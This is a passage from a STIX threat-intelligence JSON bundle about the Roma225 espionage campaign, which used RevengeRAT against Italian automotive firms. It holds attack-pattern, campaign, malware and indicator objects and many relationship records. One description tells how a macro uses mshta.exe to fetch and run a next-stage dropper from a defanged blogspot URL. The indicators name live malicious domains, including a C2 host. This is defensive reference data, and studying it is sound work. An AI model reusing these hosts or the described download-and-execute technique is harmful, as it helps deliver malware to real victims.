"source_reliability": "A",
"taxonomy_paths": [
[
"Admiralty Code",
"Admiralty Code - Credibility",
"Admiralty Code - Confirmed by other sources"
],
[
"Admiralty Code",
"Admiralty Code - Reliability",
"Admiralty Code - Completely reliable"
],
[
"Source",
"Source - EIQ Fusion"
],
[
"Targeted Technology",
"Targeted Technology - Operating Systems",
"Targeted Technology - Windows"
],
[
"Theme",
"Theme - APT"
],
[
"Source",
"Source - Mitre"
],
[
"Source Type",
"Source Type - Open Source"
],
[
"Theme",
"Theme - Generic Threats"
]
],
"title": "Technique\/T1112: Modify Registry",
"tlp_color": "WHITE"
},
"x_eclecticiq_stix1_id": "{https:\/\/attack.mitre.org}ttp-44a0e88c-1951-5a12-b907-a9d1e34c06b7",
"type": "attack-pattern",
"modified": "2019-03-06T12:13:36.107Z"
},
{
"labels": [
"kill-chain-phase--installation",
"admiralty-code--fairly-reliable",
"admiralty-code--probably-true",
"industry-sector--automotive",
"threat-actors--espionage",
"malware--remote-access-trojan",
"theme--critical-infrastructure",
"theme--generic-threats",
"source--eiq-fusion",
"kill-chain--target-manipulation--weaponization",
"theme--financial-crime",
"theme--apt"
],
"name": "Attack Pattern: Install a RevengeRAT variant and execute a series of malicious actions",
"external_references": [
{
"source_name": "mitre-attack",
"external_id": "1123",
"description": "Obtain\/re-use payloads "
},
{
"source_name": "mitre-attack",
"external_id": "1060",
"description": "Registry Run Keys \/ Start Folder "
},
{
"source_name": "mitre-attack",
"external_id": "1170",
"description": "Mshta "
},
{
"source_name": "mitre-attack",
"external_id": "T1112",
"description": "Modify Registry "
},
{
"source_name": "external-url",
"url": "https:\/\/blog.yoroi.company\/research\/the-enigmatic-roma225-campaign\/"
}
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"description": "<p> <\/p><p>The macro code in the .ppa file contains a simple instruction invoking the \u201cmshta.exe\u201d tool to download and execute the next-stage of the dropper retrieved from \u201c<em>hxxps:\/\/minhacasaminhavidacdt.blogspot[.]com\/\u201d.<\/em><\/p><p> <\/p>",
"created": "2019-02-23T16:30:24.836Z",
"id": "attack-pattern--a3bfb553-ee1d-53e8-9dc7-b0ebf12bdc5f",
"x_eclecticiq_meta": {
"estimated_observed_time": "2018-12-27T05:00:00+00:00",
"estimated_threat_start_time": "2018-12-27T05:00:00+00:00",
"half_life": 100,
"ingest_time": "2019-02-23T16:30:24.300862+00:00",
"source_reliability": "A",
"tags": [
],
"taxonomy_paths": [
[
"Kill Chain Phases",
"Kill chain phase - Installation"
],
[
"Admiralty Code",
"Admiralty Code - Reliability",
"Admiralty Code - Fairly reliable"
],
[
"Admiralty Code",
"Admiralty Code - Credibility",
"Admiralty Code - Probably True"
],
[
"Industry Sector",
"Industry Sector - Automotive"
],
[
"Threat Actors",
"Threat Actors - Espionage"
],
[
"Malware ",
"Malware - Remote Access Trojan"
],
[
"Theme",
"Theme - Critical Infrastructure"
],
[
"Theme",
"Theme - Generic Threats"
],
[
"Source",
"Source - EIQ Fusion"
],
[
"Kill Chain Phases",
"Kill Chain - Target Manipulation - Weaponization"
],
[
"Theme",
"Theme - Financial Crime"
],
[
"Theme",
"Theme - APT"
]
],
"title": "Attack Pattern: Install a RevengeRAT variant and execute a series of malicious actions",
"tlp_color": "WHITE"
},
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}ttp-70108184-2109-4463-a68d-41cd48ab65ad",
"type": "attack-pattern",
"modified": "2019-03-06T12:13:36.108Z"
},
{
"id": "indicator--5b46ea0b-0763-59e2-b169-2a32718a1214",
"labels": [
"admiralty-code--fairly-reliable",
"theme--generic-threats",
"threat-actors--espionage",
"theme--apt",
"malware--dropper",
"source--eiq-fusion",
"industry-sector--automotive",
"admiralty-code--probably-true",
"theme--critical-infrastructure"
],
"pattern": "[domain-name:value = 'pocasideiascdt.blogspot.com' AND url:value = 'https:\/\/pocasideiascdt.blogspot.com\/']",
"valid_from": "2018-12-27T05:00:00Z",
"name": "https:\/\/pocasideiascdt.blogspot.com",
"created": "2019-01-08T11:36:45.131Z",
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"x_eclecticiq_meta": {
"estimated_observed_time": "2018-12-27T05:00:00+00:00",
"estimated_threat_start_time": "2018-12-27T05:00:00+00:00",
"half_life": 10,
"ingest_time": "2018-12-31T15:23:37.963043+00:00",
"source_reliability": "A",
"tags": [
],
"taxonomy_paths": [
[
"Admiralty Code",
"Admiralty Code - Reliability",
"Admiralty Code - Fairly reliable"
],
[
"Theme",
"Theme - Generic Threats"
],
[
"Threat Actors",
"Threat Actors - Espionage"
],
[
"Theme",
"Theme - APT"
],
[
"Malware ",
"Malware - Dropper"
],
[
"Source",
"Source - EIQ Fusion"
],
[
"Industry Sector",
"Industry Sector - Automotive"
],
[
"Admiralty Code",
"Admiralty Code - Credibility",
"Admiralty Code - Probably True"
],
[
"Theme",
"Theme - Critical Infrastructure"
]
],
"title": "https:\/\/pocasideiascdt.blogspot.com",
"tlp_color": "WHITE"
},
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}indicator-08e47db5-be65-439d-8c8c-2243d60ea831",
"type": "indicator",
"modified": "2019-03-06T12:13:36.109Z"
},
{
"id": "campaign--29cca252-e0e5-55ed-90f6-847ad0f4ce14",
"labels": [
"admiralty-code--fairly-reliable",
"admiralty-code--probably-true",
"industry-sector--automotive",
"threat-actors--espionage",
"malware--remote-access-trojan",
"theme--critical-infrastructure",
"source--eiq-fusion",
"theme--apt"
],
"name": "Roma225 - Target companies in the Italian automotive sector",
"first_seen": "2018-12-27T05:00:00Z",
"description": "<p> <\/p><p>The Cybaze-Yoroi ZLab researchers investigated a recent espionage malware implant weaponized to target companies in the Italian automotive sector. The malware was spread through well written phishing emails<\/p>",
"external_references": [
{
"source_name": "external-url",
"url": "https:\/\/blog.yoroi.company\/research\/the-enigmatic-roma225-campaign\/"
}
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"created": "2018-12-31T16:12:35.368Z",
"modified": "2018-12-31T16:12:35.368Z",
"x_eclecticiq_meta": {
"estimated_observed_time": "2018-12-27T05:00:00+00:00",
"estimated_threat_start_time": "2018-12-27T05:00:00+00:00",
"half_life": 100,
"ingest_time": "2018-12-31T16:12:34.879280+00:00",
"source_reliability": "A",
"tags": [
],
"taxonomy_paths": [
[
"Admiralty Code",
"Admiralty Code - Reliability",
"Admiralty Code - Fairly reliable"
],
[
"Admiralty Code",
"Admiralty Code - Credibility",
"Admiralty Code - Probably True"
],
[
"Industry Sector",
"Industry Sector - Automotive"
],
[
"Threat Actors",
"Threat Actors - Espionage"
],
[
"Malware ",
"Malware - Remote Access Trojan"
],
[
"Theme",
"Theme - Critical Infrastructure"
],
[
"Source",
"Source - EIQ Fusion"
],
[
"Theme",
"Theme - APT"
]
],
"title": "Roma225 - Target companies in the Italian automotive sector",
"tlp_color": "WHITE"
},
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}campaign-88548ad1-1cb2-49c9-822e-a854868ec650",
"type": "campaign"
},
{
"labels": [
"admiralty-code--confirmed-by-other-sources",
"admiralty-code--completely-reliable",
"theme--generic-threats",
"theme--apt",
"industry-sector--government-national",
"source--eiq-fusion",
"industry-sector--defense",
"malware--remote-access-trojan",
"theme--critical-infrastructure",
"threat-actors--apt"
],
"name": "Malware: RevengeRAT",
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"description": "<p>Off-the-shelf remote access Trojan<\/p>",
"created": "2018-11-13T17:07:33.945Z",
"id": "malware--46142e30-38e6-5c0e-b2e4-ffcfbc443426",
"x_eclecticiq_meta": {
"estimated_observed_time": "2018-11-13T16:08:55.483257+00:00",
"estimated_threat_start_time": "2018-11-13T16:08:55.483257+00:00",
"half_life": 9999,
"ingest_time": "2018-11-13T16:08:55.483257+00:00",
"source_reliability": "A",
"tags": [
],
"taxonomy_paths": [
[
"Admiralty Code",
"Admiralty Code - Credibility",
"Admiralty Code - Confirmed by other sources"
],
[
"Admiralty Code",
"Admiralty Code - Reliability",
"Admiralty Code - Completely reliable"
],
[
"Theme",
"Theme - Generic Threats"
],
[
"Theme",
"Theme - APT"
],
[
"Industry Sector",
"Industry Sector - Government National"
],
[
"Source",
"Source - EIQ Fusion"
],
[
"Industry Sector",
"Industry Sector - Defense"
],
[
"Malware ",
"Malware - Remote Access Trojan"
],
[
"Theme",
"Theme - Critical Infrastructure"
],
[
"Threat Actors",
"Threat Actors - APT"
]
],
"title": "Malware: RevengeRAT",
"tlp_color": "WHITE"
},
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}ttp-349762e7-0223-464d-b3dc-4b561e2bd789",
"type": "malware",
"modified": "2019-03-06T12:13:36.112Z"
},
{
"id": "indicator--c0b94609-2064-55ee-9bd0-f10e8aa5f07f",
"labels": [
"admiralty-code--fairly-reliable",
"theme--generic-threats",
"threat-actors--espionage",
"theme--apt",
"source--eiq-fusion",
"industry-sector--automotive",
"admiralty-code--probably-true",
"malware--remote-access-trojan",
"theme--critical-infrastructure"
],
"pattern": "[domain-name:value = 'systen32.ddns.net']",
"valid_from": "2018-12-27T05:00:00Z",
"name": "systen32.ddns.net",
"created": "2019-02-15T14:10:16.586Z",
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"x_eclecticiq_meta": {
"estimated_observed_time": "2018-12-27T05:00:00+00:00",
"estimated_threat_start_time": "2018-12-27T05:00:00+00:00",
"half_life": 10,
"ingest_time": "2018-12-31T15:38:39.652722+00:00",
"source_reliability": "A",
"tags": [
],
"taxonomy_paths": [
[
"Admiralty Code",
"Admiralty Code - Reliability",
"Admiralty Code - Fairly reliable"
],
[
"Theme",
"Theme - Generic Threats"
],
[
"Threat Actors",
"Threat Actors - Espionage"
],
[
"Theme",
"Theme - APT"
],
[
"Source",
"Source - EIQ Fusion"
],
[
"Industry Sector",
"Industry Sector - Automotive"
],
[
"Admiralty Code",
"Admiralty Code - Credibility",
"Admiralty Code - Probably True"
],
[
"Malware ",
"Malware - Remote Access Trojan"
],
[
"Theme",
"Theme - Critical Infrastructure"
]
],
"title": "systen32.ddns.net",
"tlp_color": "WHITE"
},
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}indicator-56bb4eb2-142e-4ec8-aa56-64c75249be33",
"type": "indicator",
"modified": "2019-03-06T12:13:36.112Z"
},
{
"id": "relationship--6a5d35fe-a4ba-528d-add7-558b603b9d30",
"type": "relationship",
"created": "2019-03-06T12:13:36.114Z",
"modified": "2019-03-06T12:13:36.114Z",
"source_ref": "indicator--e1a3c8e6-8880-5001-938c-45f05978900b",
"relationship_type": "indicates",
"target_ref": "attack-pattern--e1a3c8e6-8880-5001-938c-45f05978900b"
},
{
"id": "relationship--8947397c-aef5-547d-bafc-bc702c6205b6",
"type": "relationship",
"created": "2019-03-06T12:13:36.114Z",
"modified": "2019-03-06T12:13:36.114Z",
"source_ref": "indicator--ef97960a-a76e-5009-91d4-a11bfcddd4c0",
"relationship_type": "x-indicates",
"target_ref": "identity--ef97960a-a76e-5009-91d4-a11bfcddd4c0"
},
{
"id": "relationship--0668c69d-000e-5535-ab8e-64b1baf8a865",
"type": "relationship",
"created": "2019-03-06T12:13:36.114Z",
"modified": "2019-03-06T12:13:36.114Z",
"source_ref": "indicator--a3bfb553-ee1d-53e8-9dc7-b0ebf12bdc5f",
"relationship_type": "indicates",
"target_ref": "attack-pattern--a3bfb553-ee1d-53e8-9dc7-b0ebf12bdc5f"
},
{
"id": "relationship--c21abdc5-e3cf-5d50-8ce8-096c5ef8140f",
"type": "relationship",
"created": "2019-03-06T12:13:36.114Z",
"modified": "2019-03-06T12:13:36.114Z",
"source_ref": "indicator--46142e30-38e6-5c0e-b2e4-ffcfbc443426",
"relationship_type": "indicates",
"target_ref": "malware--46142e30-38e6-5c0e-b2e4-ffcfbc443426"
},
{
"id": "relationship--3dc47196-6795-5b82-b6b3-d3c3f3f5e9a5",
"created": "2018-12-31T14:45:13.425Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-19a466c3-6f39-4347-8bc0-9a0a8d74ad4d",
"type": "relationship",
"modified": "2019-03-06T12:13:36.115Z",
"source_ref": "attack-pattern--e1a3c8e6-8880-5001-938c-45f05978900b",
"relationship_type": "uses",
"target_ref": "attack-pattern--6ecf2333-f55c-51dd-b5c8-0b678b65ffeb"
},
{
"id": "relationship--491d9cff-4603-5c95-847d-677b1fc8f219",
"created": "2018-05-15T15:30:56.400Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-2cb3a280-dcd9-590b-8db0-f48372e107c1",
"type": "relationship",
"modified": "2019-03-06T12:13:36.115Z",
"source_ref": "attack-pattern--6ecf2333-f55c-51dd-b5c8-0b678b65ffeb",
"relationship_type": "uses",
"target_ref": "attack-pattern--5f02d904-0259-5b0f-a73e-a04fcd8dce5a"
},
{
"id": "relationship--01760b0b-9af0-5768-b3a7-9b34aa3a64db",
"created": "2018-05-15T15:30:56.400Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-2cb3a280-dcd9-590b-8db0-f48372e107c1",
"type": "relationship",
"modified": "2019-03-06T12:13:36.115Z",
"source_ref": "attack-pattern--6ecf2333-f55c-51dd-b5c8-0b678b65ffeb",
"relationship_type": "uses",
"target_ref": "tool--5f02d904-0259-5b0f-a73e-a04fcd8dce5a"
},
{
"id": "relationship--fa0e0ce1-fd38-50b9-841e-64173f761693",
"created": "2018-05-15T15:30:56.400Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-2cb3a280-dcd9-590b-8db0-f48372e107c1",
"type": "relationship",
"modified": "2019-03-06T12:13:36.115Z",
"source_ref": "attack-pattern--6ecf2333-f55c-51dd-b5c8-0b678b65ffeb",
"relationship_type": "uses",
"target_ref": "malware--5f02d904-0259-5b0f-a73e-a04fcd8dce5a"
},
{
"id": "relationship--cdf5e2d3-9f0f-5ded-9940-9cc61a7d911f",
"created": "2018-05-15T15:30:56.400Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-2cb3a280-dcd9-590b-8db0-f48372e107c1",
"type": "relationship",
"modified": "2019-03-06T12:13:36.116Z",
"source_ref": "attack-pattern--6ecf2333-f55c-51dd-b5c8-0b678b65ffeb",
"relationship_type": "targets",
"target_ref": "identity--5f02d904-0259-5b0f-a73e-a04fcd8dce5a"
},
{
"id": "relationship--08313bd1-6a8f-5477-84e1-a095a8a2ebcb",
"created": "2018-05-15T15:30:56.499Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-b1d81cdd-7fdd-5558-84f0-a770a98ff53a",
"type": "relationship",
"modified": "2019-03-06T12:13:36.116Z",
"source_ref": "attack-pattern--6ecf2333-f55c-51dd-b5c8-0b678b65ffeb",
"relationship_type": "uses",
"target_ref": "attack-pattern--0777c086-4503-5ce2-993f-823a11d7c0e1"
},
{
"id": "relationship--eab7b416-fd39-5e96-91a1-d05c7136fa62",
"created": "2018-05-15T15:30:56.499Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-b1d81cdd-7fdd-5558-84f0-a770a98ff53a",
"type": "relationship",
"modified": "2019-03-06T12:13:36.116Z",
"source_ref": "attack-pattern--6ecf2333-f55c-51dd-b5c8-0b678b65ffeb",
"relationship_type": "uses",
"target_ref": "tool--0777c086-4503-5ce2-993f-823a11d7c0e1"
},
{
"id": "relationship--9ee00cb2-b298-5bd6-815b-35102a420019",
"created": "2018-05-15T15:30:56.499Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-b1d81cdd-7fdd-5558-84f0-a770a98ff53a",
"type": "relationship",
"modified": "2019-03-06T12:13:36.117Z",
"source_ref": "attack-pattern--6ecf2333-f55c-51dd-b5c8-0b678b65ffeb",
"relationship_type": "uses",
"target_ref": "malware--0777c086-4503-5ce2-993f-823a11d7c0e1"
},
{
"id": "relationship--b555e47e-8103-5d20-b575-c9c8225f805d",
"created": "2018-05-15T15:30:56.499Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-b1d81cdd-7fdd-5558-84f0-a770a98ff53a",
"type": "relationship",
"modified": "2019-03-06T12:13:36.117Z",
"source_ref": "attack-pattern--6ecf2333-f55c-51dd-b5c8-0b678b65ffeb",
"relationship_type": "targets",
"target_ref": "identity--0777c086-4503-5ce2-993f-823a11d7c0e1"
},
{
"id": "relationship--cd48960f-b790-52e9-b9fb-4a087fc5e09f",
"created": "2018-05-15T15:14:52.197Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-62c9365e-8af5-599b-ad3a-fd437044af5b",
"type": "relationship",
"modified": "2019-03-06T12:13:36.117Z",
"source_ref": "attack-pattern--6ed91203-7f3a-57db-a115-e2ebc5ca1943",
"relationship_type": "uses",
"target_ref": "attack-pattern--2c435d87-2a2f-56ba-8445-5627161553f7"
},
{
"id": "relationship--3857620f-aee2-5f84-8619-4b9d4766ab01",
"created": "2018-05-15T15:14:52.197Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-62c9365e-8af5-599b-ad3a-fd437044af5b",
"type": "relationship",
"modified": "2019-03-06T12:13:36.117Z",
"source_ref": "attack-pattern--6ed91203-7f3a-57db-a115-e2ebc5ca1943",
"relationship_type": "uses",
"target_ref": "tool--2c435d87-2a2f-56ba-8445-5627161553f7"
},
{
"id": "relationship--516160bd-467e-52d8-b55c-76fa4f216c72",
"created": "2018-05-15T15:14:52.197Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-62c9365e-8af5-599b-ad3a-fd437044af5b",
"type": "relationship",
"modified": "2019-03-06T12:13:36.118Z",
"source_ref": "attack-pattern--6ed91203-7f3a-57db-a115-e2ebc5ca1943",
"relationship_type": "uses",
"target_ref": "malware--2c435d87-2a2f-56ba-8445-5627161553f7"
},
{
"id": "relationship--567d3362-c71b-54e8-9818-90f403bb7113",
"created": "2018-05-15T15:14:52.197Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-62c9365e-8af5-599b-ad3a-fd437044af5b",
"type": "relationship",
"modified": "2019-03-06T12:13:36.118Z",
"source_ref": "attack-pattern--6ed91203-7f3a-57db-a115-e2ebc5ca1943",
"relationship_type": "targets",
"target_ref": "identity--2c435d87-2a2f-56ba-8445-5627161553f7"
},
{
"id": "relationship--99824817-d541-59d8-9ca7-ae07b48499c9",
"created": "2018-12-31T14:45:13.435Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-749c474f-710d-4018-8735-1c1e757986a3",
"type": "relationship",
"modified": "2019-03-06T12:13:36.118Z",
"source_ref": "indicator--24bb51ea-2fb9-587a-86e8-7b0f34e013ae",
"relationship_type": "indicates",
"target_ref": "attack-pattern--e1a3c8e6-8880-5001-938c-45f05978900b"
},
{
"id": "relationship--dcbf8a7c-d402-52d3-8a2e-395c2cd2cd41",
"created": "2018-12-31T15:58:19.428Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-4190cb35-5198-436d-8801-00f7340836f9",
"type": "relationship",
"modified": "2019-03-06T12:13:36.119Z",
"source_ref": "indicator--6880007b-2a92-56ef-becb-59973a1f8ad6",
"relationship_type": "indicates",
"target_ref": "attack-pattern--e1a3c8e6-8880-5001-938c-45f05978900b"
},
{
"id": "relationship--620836cf-9609-59d4-a66e-70ff0a2ae0e4",
"created": "2018-05-15T15:31:07.131Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-8c41b985-3400-52c0-9d30-2e2f045eb0ca",
"type": "relationship",
"modified": "2019-03-06T12:13:36.119Z",
"source_ref": "attack-pattern--07f560c1-ef9f-56cb-9682-ba3985e0a260",
"relationship_type": "uses",
"target_ref": "attack-pattern--9a79a6ef-765f-55b2-847d-1dbbe24947cd"
},
{
"id": "relationship--d4166856-5ff1-5243-b306-9677443c168d",
"created": "2018-05-15T15:31:07.131Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-8c41b985-3400-52c0-9d30-2e2f045eb0ca",
"type": "relationship",
"modified": "2019-03-06T12:13:36.119Z",
"source_ref": "attack-pattern--07f560c1-ef9f-56cb-9682-ba3985e0a260",
"relationship_type": "uses",
"target_ref": "tool--9a79a6ef-765f-55b2-847d-1dbbe24947cd"
},
{
"id": "relationship--83c51a38-0482-5e8a-9b97-068b8a33e3fc",
"created": "2018-05-15T15:31:07.131Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-8c41b985-3400-52c0-9d30-2e2f045eb0ca",
"type": "relationship",
"modified": "2019-03-06T12:13:36.120Z",
"source_ref": "attack-pattern--07f560c1-ef9f-56cb-9682-ba3985e0a260",
"relationship_type": "uses",
"target_ref": "malware--9a79a6ef-765f-55b2-847d-1dbbe24947cd"
},
{
"id": "relationship--07f05148-f91d-5f94-a4a9-d41a30269fc4",
"created": "2018-05-15T15:31:07.131Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-8c41b985-3400-52c0-9d30-2e2f045eb0ca",
"type": "relationship",
"modified": "2019-03-06T12:13:36.120Z",
"source_ref": "attack-pattern--07f560c1-ef9f-56cb-9682-ba3985e0a260",
"relationship_type": "targets",
"target_ref": "identity--9a79a6ef-765f-55b2-847d-1dbbe24947cd"
},
{
"id": "relationship--cedac113-b104-58b1-9086-d72ad865f5e9",
"created": "2018-12-31T15:24:47.327Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-e033868c-df66-4292-ad48-022789a197d4",
"type": "relationship",
"modified": "2019-03-06T12:13:36.121Z",
"source_ref": "indicator--e676bc18-efa3-5a34-99e7-61a53d3e1f67",
"relationship_type": "indicates",
"target_ref": "attack-pattern--e1a3c8e6-8880-5001-938c-45f05978900b"
},
{
"id": "relationship--3591d186-1331-5372-b0cc-f4fcd5780a97",
"created": "2018-12-31T15:58:53.036Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-9f489a37-b8e1-4589-aab0-a84369c47de4",
"type": "relationship",
"modified": "2019-03-06T12:13:36.121Z",
"source_ref": "indicator--cc6fe40d-af7d-5a9c-bde1-b151101f5c1d",
"relationship_type": "indicates",
"target_ref": "attack-pattern--e1a3c8e6-8880-5001-938c-45f05978900b"
},
{
"id": "relationship--ed05117e-6431-5960-b6b9-c9c87b9e0c94",
"created": "2018-05-15T15:30:56.140Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-e886f68f-7991-50d8-ba50-e118a7fedf2e",
"type": "relationship",
"modified": "2019-03-06T12:13:36.121Z",
"source_ref": "attack-pattern--a298e1a5-1f98-51af-b4c9-aebe23bb246d",
"relationship_type": "uses",
"target_ref": "attack-pattern--5f02d904-0259-5b0f-a73e-a04fcd8dce5a"
},
{
"id": "relationship--c5315d97-cbf2-599d-91f5-c5d7e3b90d46",
"created": "2018-05-15T15:30:56.140Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-e886f68f-7991-50d8-ba50-e118a7fedf2e",
"type": "relationship",
"modified": "2019-03-06T12:13:36.121Z",
"source_ref": "attack-pattern--a298e1a5-1f98-51af-b4c9-aebe23bb246d",
"relationship_type": "uses",
"target_ref": "tool--5f02d904-0259-5b0f-a73e-a04fcd8dce5a"
},
{
"id": "relationship--a0e57418-2f40-5205-9609-e55bdce0323a",
"created": "2018-05-15T15:30:56.140Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-e886f68f-7991-50d8-ba50-e118a7fedf2e",
"type": "relationship",
"modified": "2019-03-06T12:13:36.122Z",
"source_ref": "attack-pattern--a298e1a5-1f98-51af-b4c9-aebe23bb246d",
"relationship_type": "uses",
"target_ref": "malware--5f02d904-0259-5b0f-a73e-a04fcd8dce5a"
},
{
"id": "relationship--1bb207de-81c8-5fb8-8c97-61267ef1e938",
"created": "2018-05-15T15:30:56.140Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-e886f68f-7991-50d8-ba50-e118a7fedf2e",
"type": "relationship",
"modified": "2019-03-06T12:13:36.122Z",
"source_ref": "attack-pattern--a298e1a5-1f98-51af-b4c9-aebe23bb246d",
"relationship_type": "targets",
"target_ref": "identity--5f02d904-0259-5b0f-a73e-a04fcd8dce5a"
},
{
"id": "relationship--5d46c0cb-ddc6-5f12-a6bf-cf92ab2b8c77",
"created": "2019-02-23T16:30:27.089Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-36001371-3f8f-4d65-aa8c-2d3500ccff26",
"type": "relationship",
"modified": "2019-03-06T12:13:36.122Z",
"source_ref": "attack-pattern--a3bfb553-ee1d-53e8-9dc7-b0ebf12bdc5f",
"relationship_type": "uses",
"target_ref": "attack-pattern--a298e1a5-1f98-51af-b4c9-aebe23bb246d"
},
{
"id": "relationship--3994e5fc-fd1e-5b7e-aadc-9faff113def0",
"created": "2019-02-23T16:30:27.161Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-57fcb3dd-c212-4131-92c8-7979a0fd8eca",
"type": "relationship",
"modified": "2019-03-06T12:13:36.123Z",
"source_ref": "attack-pattern--a3bfb553-ee1d-53e8-9dc7-b0ebf12bdc5f",
"relationship_type": "uses",
"target_ref": "attack-pattern--07f560c1-ef9f-56cb-9682-ba3985e0a260"
},
{
"id": "relationship--ff30afd9-fa6b-5300-8f34-453bf81da5b2",
"created": "2019-02-23T16:30:28.083Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-341229e3-beca-4ae5-a155-318230c8b110",
"type": "relationship",
"modified": "2019-03-06T12:13:36.123Z",
"source_ref": "attack-pattern--a3bfb553-ee1d-53e8-9dc7-b0ebf12bdc5f",
"relationship_type": "uses",
"target_ref": "attack-pattern--6ecf2333-f55c-51dd-b5c8-0b678b65ffeb"
},
{
"id": "relationship--f1df5482-d56a-5e2c-8255-081a04b104ec",
"created": "2019-02-23T16:30:28.127Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-99369313-afb6-439f-9a1b-49ffabf69b87",
"type": "relationship",
"modified": "2019-03-06T12:13:36.123Z",
"source_ref": "attack-pattern--a3bfb553-ee1d-53e8-9dc7-b0ebf12bdc5f",
"relationship_type": "uses",
"target_ref": "attack-pattern--6ed91203-7f3a-57db-a115-e2ebc5ca1943"
},
{
"id": "relationship--706afce1-5636-519e-be1b-040fb6824a45",
"created": "2019-02-23T16:30:28.977Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-1206f03f-6658-4f4f-a9bf-acf99346d9a7",
"type": "relationship",
"modified": "2019-03-06T12:13:36.124Z",
"source_ref": "attack-pattern--a3bfb553-ee1d-53e8-9dc7-b0ebf12bdc5f",
"relationship_type": "uses",
"target_ref": "attack-pattern--b1c9c368-c1f5-51b7-b0a6-aa80ec7bb5e2"
},
{
"id": "relationship--b75ac87a-72e1-5f90-8733-530fffc15017",
"created": "2019-02-23T16:30:28.977Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-1206f03f-6658-4f4f-a9bf-acf99346d9a7",
"type": "relationship",
"modified": "2019-03-06T12:13:36.124Z",
"source_ref": "attack-pattern--a3bfb553-ee1d-53e8-9dc7-b0ebf12bdc5f",
"relationship_type": "uses",
"target_ref": "tool--b1c9c368-c1f5-51b7-b0a6-aa80ec7bb5e2"
},
{
"id": "relationship--91cb8994-9132-5663-b24c-8a8f7e530ecd",
"created": "2019-02-23T16:30:28.977Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-1206f03f-6658-4f4f-a9bf-acf99346d9a7",
"type": "relationship",
"modified": "2019-03-06T12:13:36.124Z",
"source_ref": "attack-pattern--a3bfb553-ee1d-53e8-9dc7-b0ebf12bdc5f",
"relationship_type": "uses",
"target_ref": "malware--b1c9c368-c1f5-51b7-b0a6-aa80ec7bb5e2"
},
{
"id": "relationship--6bb1fbc0-537f-5487-b6c5-60071736e8af",
"created": "2019-02-23T16:30:28.977Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-1206f03f-6658-4f4f-a9bf-acf99346d9a7",
"type": "relationship",
"modified": "2019-03-06T12:13:36.125Z",
"source_ref": "attack-pattern--a3bfb553-ee1d-53e8-9dc7-b0ebf12bdc5f",
"relationship_type": "targets",
"target_ref": "identity--b1c9c368-c1f5-51b7-b0a6-aa80ec7bb5e2"
},
{
"id": "relationship--8e4abab0-84f4-5993-9652-93dafbcdb5b4",
"created": "2018-12-31T15:23:42.721Z",
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}relation-3c47a332-3340-4aec-8893-91de45a8db73",
"type": "relationship",
"modified": "2019-03-06T12:13:36.125Z",
"source_ref": "indicator--5b46ea0b-0763-59e2-b169-2a32718a1214",
"relationship_type": "indicates",
"target_ref": "attack-pattern--e1a3c8e6-8880-5001-938c-45f05978900b"
},
{
"id": "relationship--713e98b9-8224-5dd8-985a-b11c5a5dbf5a",
